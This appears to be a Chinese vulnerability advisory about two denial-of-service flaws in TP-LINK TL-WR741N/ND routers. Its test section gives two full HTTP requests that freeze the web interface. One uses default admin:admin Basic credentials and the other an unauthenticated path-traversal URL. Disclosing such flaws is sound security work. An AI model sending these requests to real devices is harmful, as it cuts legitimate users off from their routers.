受影响系统:
TP-LINK TL-WR741N
TP-LINK TL-WR741ND
描述:
BUGTRAQ ID: 59325
TP-LINK TL-WR741N、TL-WR741ND是150mbps无线路由器。
TP-LINK TL-WR741N、TL-WR741ND在实现上存在多个拒绝服务漏洞,其中一个漏洞需要攻击者经过身份验证,另外一个无需经过身份验证,这些漏洞可造成设备远程被冻结,拒绝服务合法用户。
<*来源:W1ckerMan 链接:http://packetstormsecurity.com/files/121359/tplink-freezedos.txt http://www.exploit-db.com/exploits/24504/ *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1 – FREEZING TP-LINK WEB INTERFACE (You need to be autenticated)
//You need the line Authorization: Basic YWRtaW46YWRtaW4=
//maybe admin admin ????
GET http://192.168.1.1:80/userRpm/DdnsAddRpm.htm?provider=4 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/userRpm/DdnsAddRpm.htm?provider=4
Authorization: Basic YWRtaW46YWRtaW4=
2 – FREEZING TP-LINK WEB INTERFACE (You don’t need autentication)
GET http://192.168.1.1:80/help/../../root HTTP/1.1
Host: 192.168.178.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/help/
建议:
厂商补丁:
TP-LINK
——-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.tp-link.com/en/support/download/
评论关闭。